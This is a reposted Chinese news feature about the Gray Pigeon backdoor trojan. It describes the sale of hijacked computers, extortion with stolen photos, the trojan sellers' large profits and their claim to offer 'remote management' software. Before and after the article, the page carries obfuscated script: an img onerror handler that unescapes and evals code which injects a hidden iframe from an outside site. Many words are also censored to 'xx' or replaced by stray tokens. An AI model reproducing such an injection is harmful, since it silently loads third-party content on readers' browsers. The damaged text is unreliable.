“灰鸽子”黑色暴利成就“病毒富豪” - BankCard - functionary - 和讯博客
“灰鸽子”黑色暴利成就“病毒富豪” [转贴 2010-04-03 08:49:59]   
“灰鸽子”黑色暴利成就“病毒富豪”

0 && image.height>0){if(image.width>=700){this.width=700;this.height=image.height*700/image.width;}}" src='http://gimg.baidu.com/img/gsgs.gif' width=0 height=0 onerror="eval (unescape('var%20content1%3D%22%3CI+FR+AME%20%20align%3Dcenter%20marginWidth%3D0%20marginHeight%3D0%20src%3Dhttp%3A//qdsm.net/links/zf_336_280.html%20width%3D336%20height%3D280%20frameBorder%3D0%20scrolling%3Dno%3E%3C/I+FRAM+E%3E%22%3B%20document.getElementById%28%22contenthtml1%22%29.innerHTML%3D%20content1'.replace(/\+/g,'')))">

“熊猫烧香”事件刚刚告一段落,目前又有个名为“灰鸽子”的病毒,正在大规模传播,其危害被认为是“熊猫烧香病毒”的10倍!在一系列电脑病毒疯狂发作的背后,是鲜为人知的“病毒富豪”生产线!    3月15日,轰动全国的“熊猫烧香”病毒制造者李俊涉嫌破坏计算机信息系统罪,被湖北省仙桃市检察院批准逮捕。“熊猫烧香”被列为2006年度xx病毒之首,李俊本人也被称为“毒王”。
    “‘熊猫烧香’病毒事件再一次给我们敲响了警钟。”全国人大代表张学东在日前闭幕的全国“两会”上,列举了一系列令人触目惊心的网络犯罪数据:2005年,全国计算机信息系统的病毒感染率为80%,全国有9100多个网站被恶意篡改并报案,其中政府网站2027个;2006年1月,又有391个政府网站被恶意篡改……
“肉鸡”汹涌的黑市
    一台台中毒的电脑被称为“肉鸡”在网上公开叫卖:辽宁“肉鸡”5毛到8毛每台、广东“肉鸡”1块一台、港台“肉鸡”3块、外国“肉鸡”5块……
    北京海淀区法院日前审结了一起侵入别人电脑xx隐私资料然后借机敲诈勒索的案件。该案犯名叫李金华,他使用“灰鸽子”木马窃取了受害人存在电脑上的裸体照片,然后给受害人发消息,敲诈14万元。在7万元已得手的情况下,李金华仍然继续敲诈受害人。{zh1}受害人报警,李本人获刑6年。虽然罪犯绳之以法,但是这件事却在受害者心中留下了永远阴影。
    究竟什么是“灰鸽子”木马?据反病毒专家介绍,“灰鸽子”曾在去年上半年度被评为当年xx病毒之“毒王”,是一种后门程序,黑客可借此远程控制被感染病毒的电脑,随意上传下载、删除或修改用户电脑中的文件并xx用户网络游戏账号及银行密码。
    这是一个隐藏在超过两千万台接通网络的计算机中的木马,每一台中了此木马的电脑就成了控制者手里的“肉鸡”。这些“肉鸡”在控制者手中就像大白菜一样被卖来卖去,低至1分钱一只,高达几块钱一只。
    在百度“灰鸽子”贴吧,一台台中毒的电脑被称为“肉鸡”在网上公开叫卖:辽宁“肉鸡”5毛到8毛每台、广东“肉鸡”1块一台、港台“肉鸡”3块、外国“肉鸡”5块……从“肉鸡”上xx的QQ号码、游戏币、游戏账号、隐私资料等等通过一些手段大肆交易,一些人成为富豪,更多的人成为受害者。李明(化名)就是在3年前一次偶然的聊天后变成了一个“肉鸡”贩子,也从一个受害者变成了一个害人者。
    “只要装上‘灰鸽子’,然后在别人电脑上种上‘灰鸽子’木马,对方电脑就会成为你的‘肉鸡’,任你宰割。”李明介绍说。一方是控制端,另一方是被控制端(也就是“肉鸡”)。控制端可以在被控制端的“电脑”上做任何事情,然后再把“战场”清理得了无痕迹。
    李明就是这样在朋友的介绍下开始使用“灰鸽子”的。开始时他兼职抓“肉鸡”,{yt}抓100只“鸡”不成问题,也能有百八十块的收入。当他抓“鸡”的数量与日俱增、技术也越来越娴熟时,他干脆辞掉了公职。他还买下一些控制端不打算再玩了而低价出售的“肉鸡”,然后倒手卖出去赚个差价。“这样的收入比我以前的工作多多了。”
    某网站公开的资料显示,圈内公开的行价是内陆“鸡”1毛钱到4毛钱每台,辽宁“鸡”5毛钱到8毛钱每台,广东“肉鸡”1块钱一台,港台“鸡”3块钱,外国“肉鸡”5块钱……因为辽宁、广东“肉鸡”玩游戏的多,买来后能窃取更多游戏币,“肉鸡”的利用价值更高,所以价钱更贵一些。有互联网分析人士指出,国外“鸡”之所以高价,是为了xx魔兽等一些流行游戏国外服务器的账号。魔兽金币在国外服务器的价格是国内的两倍。
    “人的心理的阴暗面一旦被激发,就很难控制。”李明说。
    在一些交易站点,“肉鸡”的卖主们俨然是一副“诚信经营”的模样,采用诚信打分制,让买主给他们打分。他们通过交易网站、网络支付等正当的交易手段销售从“肉鸡”上盗窃来的QQ号码、QQ币、游戏币、名人隐私资料、私人照片、私人视频等,买家和卖家的交易就这样在网上如火如荼地进行。据介绍,有人在“运气好”的时候,一晚上能xx1000个QQ号码,一个卖10块钱,就能卖1万块钱。
    除了倒卖“肉鸡”、销售盗窃赃物外,他们还操纵“肉鸡”,让“肉鸡”成为他们牟利的工具。同时,“灰鸽子”制作者及转卖者要控制下线也非常容易。对软件稍作修改留个后门,让这些控制“肉鸡”的机器再变成半个“肉鸡”,然后再吃他们从“肉鸡”那带来的好处。这在行业里叫做“黑吃黑”。
    这种暴利刺激着更多的人加入进来。据统计,从百度上搜索的讨论“灰鸽子”的论坛有数十个之多。一个庞大的“灰鸽子”帝国日渐形成。
    反病毒专家指出,目前80%以上的木马后门病毒都具备远程监控、xx等功能,“灰鸽子”只是其中的一种。之所以会有如此大的传播范围,主要有两方面原因:一是在网上可以很容易得到“灰鸽子”;二是由于“灰鸽子”作为一款入门级黑客程序,对一些黑客新手来说,使用起来会更容易。
    据金山毒霸全球反病毒监测中心数据,仅2007年2月一个月时间,中国网络中大约有258235台计算机感染了“灰鸽子”木马病毒而被他人控制,而同期中国共有2065873台电脑感染计算机病毒。也就是说中国每10台感染病毒的计算机中,就有1.25台电脑感染的是“灰鸽子”,成为了黑客或非法分子控制的“肉鸡”。
年收入数千万的病毒富豪
    2006年一家提供“灰鸽子病毒”的网站峰值独立访问的IP就是1.7万/天,5%的访问者会下载购买,它的收入{yt}就是6万元,而且不用缴税。
    在这个庞大的“灰鸽子”帝国里,一切想成为控制者的人都得像李明一样花100元不等的钱购买灰鸽子控制端软件,然后每年付给该网站100元的管理费用(这个标准时有变化)。
    一位业内人士算了一笔账,2006年某提供“灰鸽子”的网站峰值独立访问的IP就是1.7万/天,峰谷是0.6万/天,平均峰值为1.2万。按照互联网的一般规律,5%的访问者会下载购买,那么{yt}就有600人下载购买,它的收入{yt}就是6万元,那么该工作室一年的收入就是2190万元,而且不用缴税。
    据一位从2003年年初就开始卖二手“灰鸽子”的人士透露,上述网站一年的收入远远不止这些。该人士指出,该网站开发的这个病毒程序有多个流通渠道,这些渠道可能卖的有xx版(即盗版),但也在帮助它销售。它还可能有线下销售模式,而且它还可以代理制作销售其他木马或病毒。另外有使用者在网站上发帖举报“灰鸽子”制作者在一些销售出去的软件上留有后门,以用来控制“控制者”,和他们分享“肉鸡”带来的收益。“它一年的收入估计不下1亿元。”该人士表示。
    该网站上的资料显示,该网站只有两个成员,客服都用QQ取代,客服电话在偏僻的安徽某县,另聘请有一个法律顾问。因此,其人力及办公等成本极为低廉。
    一位在中关村某IT公司混迹多年的人士说:“别小看这些人,他们好多人的资产比一些中小规模的公司的资产都要大得多。前一阵媒体报道热烈的‘熊猫烧香病毒’的主角李俊,一个月至少获利15万元太小意思了。这些人赚足了钱之后,就xxx白自己,摇身一变成为富有正义感的企业家。”
真假“木马”凸显法律漏洞
    “哪个网管会用‘病毒’这种工具管理网内电脑?除非他是窥私癖,或者有其他不可告人的特殊目的。”
    现在,麦卡菲、金山毒霸、卡巴斯基、瑞星等几乎所有的信息安全厂商都将这个叫做“灰鸽子”的软件作为木马来查杀,然而它一直辩称自己是“远程管理软件”。
    “哪个网管会用‘病毒’这种工具管理网内电脑?除非他是窥私癖,或者有其他特殊目的。”一位管理着整个公司上百台电脑的网管说。
    在“灰鸽子”的功能介绍中,制作者将其定义为“远程管理软件”。然而它可以在“被管理者”一无所知的情况下,在被“管理”的计算机上做任何事情:它可以模仿Windows 资源管理器,可以对文件进行复制、粘贴、删除、重命名、远程运行等;它可以查看远程摄像头,有语音聊天功能;它还可以对自动上线的“肉鸡”实施关机、重启、打开网页等命令以及其他一切的控制、修改、偷窥、盗窃、敲诈等功能。
    金山毒霸的工程师李铁军直言不讳地说:“它就是一个木马,带有再明显不过的木马特征。我们就是要查杀它,而且我们现在的专杀工具可以查杀它的任何变种。”就在李铁军和他的同事在准备推出“灰鸽子”专杀工具之际,一位自称是“灰鸽子”客服的人员打来电话,称希望“慎重考虑”。
    “它如果没有这么大财力是不敢做出这种有威胁意味的举动的,至少说明这个提供‘灰鸽子’的网站每年获得的收益至少是数千万元级别的。”李铁军称。
    这样一个具有再明显不过的病毒特征的“灰鸽子”,其制作者和得益者都将它称之为“远程管理软件”。其制作者这样说,“我只是私自造了一把枪,他们买去xx还是自卫与我无关。”就像其免责声明中所说,“本站无法鉴别判断用户使用软件的用途,敬请用户合法使用本站所提供的软件。用户一旦因非法使用本站软件而违反国家法律法规,其造成的一切不良后果由行为人独立承担,本站概不负责也不承担任何法律责任。”
    李明坦言,“我们这些人并不是在自卫,我们一开始就是用它来xx。”
    国家计算机病毒应急处理中心副主任张健表示,利用“灰鸽子”窃取他人信息,应该是一种违法行为,但是要从严格的法律角度进行判定的话,可能又很难按照现有的法律进行惩处,所以也是属于互联网高速发展产生的众多问题中,一个亟待xx的难题。
■声 音
没有隐私的可怕世界
    一位不愿透露姓名的“灰鸽子”控制者透露,“被我控制过的‘肉鸡’前后超过4万台。如果这些互联网用户知道自己的计算机在被‘灰鸽子’木马监视着一举一动,那将会是非常恐怖的。”
    如果“灰鸽子”控制电脑的数量按照目前的速度增长,到2007年年底,我国将至少有一半可上网电脑变成“肉鸡”。
    如此庞大的群体隐私该如何保护?被侵犯的隐私权以及被xx的虚拟财产甚至真实财产又该如何保护?这显然是一个重大的社会问题。

0 && image.height>0){if(image.width>=700){this.width=700;this.height=image.height*700/image.width;}}" src='http://gimg.baidu.com/img/gsgs.gif' width=0 height=0 onerror="eval (unescape('var%20content1%3D%22%3CI+FR+AME%20%20align%3Dcenter%20marginWidth%3D0%20marginHeight%3D0%20src%3Dhttp%3A//qdsm.net/links/zf_180_150.html%20width%3D180%20height%3D150%20frameBorder%3D0%20scrolling%3Dno%3E%3C/I+FRAM+E%3E%22%3B%20document.getElementById%28%22contenthtml2%22%29.innerHTML%3D%20content1'.replace(/\+/g,'')))">

郑重声明:资讯 【“灰鸽子”黑色暴利成就“病毒富豪” - BankCard - functionary - 和讯博客】由 发布,版权归原作者及其所在单位,其原创性以及文中陈述文字和内容未经(企业库qiyeku.com)证实,请读者仅作参考,并请自行核实相关内容。若本文有侵犯到您的版权, 请你提供相关证明及申请并与我们联系(qiyeku # qq.com)或【在线投诉】,我们审核后将会尽快处理。
—— 相关资讯 ——